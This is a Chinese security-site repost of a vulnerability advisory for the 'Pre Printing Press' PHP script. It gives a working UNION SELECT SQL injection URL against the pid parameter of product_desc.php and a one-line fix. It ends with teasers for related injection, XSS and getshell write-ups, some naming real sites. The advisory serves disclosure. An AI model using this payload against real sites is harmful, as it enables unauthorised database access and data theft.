网站优化

首页 > 新闻资讯 > 网站优化 > Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

2019-09-12 热度:93 ℃
标题: Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability
基本: Pre Printing Press
售价: $999
脚本编写: PHP
状态: vulnerable
|致谢: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
  证明
  [+] 概述
   A complete printing press website script contains all features required for online printing
   business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy
   to navigate. Package contains builtin designers to customize designs online, shopping cart
   and complete users and orders modules.Product is user friedly and can fully operate via
   secure admin panel.Script is fully customizable and ready to upload to start your printing
   press now.
  [+] 缺陷
    http://[host]/[path]/prestudio/product_desc.php?pid=[vul]
  [+] Injectable
    http:// [ www.it165.net ]/[path]/prestudio/product_desc.php?pid=1
    +union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1--+&cid=&sid=
  [+] 修复
 
过滤相应页面的参数输入

相关文章

代码审计:ecshop的goods_attr和goods_attr_id两个二次注入漏洞详细分析

代码审计:ecshop的goods_attr和goods_attr_id两个二次注入漏洞详细分析

一:goods_attr_id的二次注入 注入利用过程: 1.添加商品到购物车时,写入注入代码到商品属性id http://localhost/test/ecshop/flow...

ASPX文件构造可注射跨站

ASPX文件构造可注射跨站

昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。 其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用...

代码审计:ecshop最新版本SQL注入+存储XSS=任意管理员登录 附利用exp

代码审计:ecshop最新版本SQL注入+存储XSS=任意管理员登录 附利用exp

一个功能点的SQL注入和存储XSS,内含多种技巧,我觉得我就是个艺术家~~ 刚下的ecshop V2.7.3版本~   1.漏洞存在于站外广告统计功能(对应管理后台的报表...

解读XSS跨站点脚本攻击

解读XSS跨站点脚本攻击

如果用户表单输入一些内容,……特别是一些内容比较多的表单项,且无固定格式 ,如地址,文章内容……此时用户可以输入JS代码等来执行...

360应用开放平台过滤漏洞致注入及修复方案

360应用开放平台过滤漏洞致注入及修复方案

缺陷点如下:   http://open.se.360.cn/static/js/patch.php?app_key=[注入点]   测试如下:  ...

土豆两个分站远程代码执行漏洞

土豆两个分站远程代码执行漏洞

土豆channels.tudou.com“频道”分站远程代码执行漏洞   sleep 5秒测试代码:   POST /director...

Informix数据库SQL注入实战

Informix数据库SQL注入实战

在最近的应用程序渗透测试中,我发现一个有意思的sql漏洞(SQLI中)。 SQLI出现这种情况的原因: 1.开发中带来的问题 2.数据库正在使用 下面,我来介绍介绍我遇到的问题以...

代码审计:kesioncms(科讯cms) 6.x至8.x版本getshell漏洞附利用exp与修复

代码审计:kesioncms(科讯cms) 6.x至8.x版本getshell漏洞附利用exp与修复

未对提交参数判断,导致可以写任意文件到服务器上… Wap/Plus/PhotoVote.asp 14 – 23 Dim KS:Set KS=New...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!